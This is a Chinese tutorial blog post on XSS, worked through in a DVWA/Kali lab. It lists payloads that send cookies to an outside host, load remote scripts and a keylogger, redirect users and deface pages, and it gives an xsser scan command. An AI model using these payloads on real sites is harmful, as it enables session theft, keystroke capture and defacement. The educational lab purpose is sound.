XSS

原理

在这里插入图片描述

hacker在服务器端插入恶意代码,在客户端向服务器发起请求后,将恶意代码返回给客户端

常见利用方法

  1. 盗取Cookie
  2. 重定向

使用场景

在这里插入图片描述

常见XSS漏洞类型

在这里插入图片描述

漏洞利用

  1. 爬网
  2. 变量注入:随意提交
  3. 当提交内容被原样返回:可能存在XSS

1、反射型

  1. 环境:metasploitable2(dvwa)、kali
  1. 步骤:
  1. 随意输入,结果返回相同:可能存在XSS
    在这里插入图片描述
  1. 输入JS代码尝试:<a href=“http://www.baidu.com”>click

在这里插入图片描述

  1. 结果:
    在这里插入图片描述
  1. 例:
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
  1. 常用注入语句:
<script>alert(‘xss’)</script>    #弹出警告窗口
<a href='' onclick=alert('xss')>type</a>      #点击后弹出警告窗口
<img src=http://1.1.1.1/a.ipg οnerrοr=alert('xss')>    # 取图错误提示
<script>window.location=‘http://1.1.1.1'</script>		#重定向,当将IP地址换成自己的主机后,使用sudo nc -vnlp 80侦听80端口,可以看到用户提交的数据;其他具有IP地址命令同理
<iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe>   #插入框架

Cookie窃取

<script>new Image().src="http://1.1.1.1/c.php?output="+document.cookie; </script>     #<font color=red>Cookie窃取</font>
<script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS
WEBSITE IS UNDER ATTACK</h1></div>";</script>      #页面篡改
<script src=http://1.1.1.1/a.js></script> #去其他位置取一个脚本,适用于注入大型脚本

在这里插入图片描述
在具有XSS漏洞的页面执行:<script src=http://192.168.181.128/a.js></script>,该指令会链接到/var/www/html/a.js,从而执行a.js中的代码。

键盘敲击记录器

在这里插入图片描述
在具有XSS漏洞的页面执行:<script src="http://192.168.181.128/keylogger.js"></script>
在这里插入图片描述
结果:在输入界面敲击键盘,然后查看keylog.txt
在这里插入图片描述
最后进行URL伪造
keylogger.js
在这里插入图片描述

keylogger.php
在这里插入图片描述

URL伪造

在这里插入图片描述
上图是用户敲击记录的页面,但是URL很明显不对(内涵script代码),所以:
在这里插入图片描述
在这里插入图片描述
然后点击链接后,键盘敲击就会被记录
a.html
在这里插入图片描述

2、存储型

  1. 特点:永久存储

3、DOM型

在这里插入图片描述

<script>var img=document.createElement("img");img.src="http://
192.168.20.8:88/log?"+escape(document.cookie);</script>

xsser

  1. xsser -u “http://192.168.181.132/dvwa/vulnerabilities/” -g “xss_r/?name=” – 130 ⨯
    cookie=“security=low; PHPSESSID=70ea7ab1a155cc3709dd75f7e6866b03” -S -v --reverse-check
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值